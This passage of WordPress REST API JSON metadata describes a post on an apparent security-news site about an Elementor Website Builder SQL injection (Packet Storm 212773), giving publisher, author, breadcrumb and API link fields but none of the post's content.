Injection_PACKETSTORM:212773","datePublished":"2025-12-12T11:58:35+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=30767"},"wordCount":1462,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-7.2","exploit","HIGH","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=30767#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=30767","url":"https:\/\/zero.redgem.net\/?p=30767","name":"\ud83d\udcc4 Elementor Website Builder SQL Injection_PACKETSTORM:212773 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-12-12T11:58:35+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=30767#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=30767"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=30767#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Elementor Website Builder SQL Injection_PACKETSTORM:212773"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/30767","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=30767"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/30767\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=30767"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=30767"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=30767"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}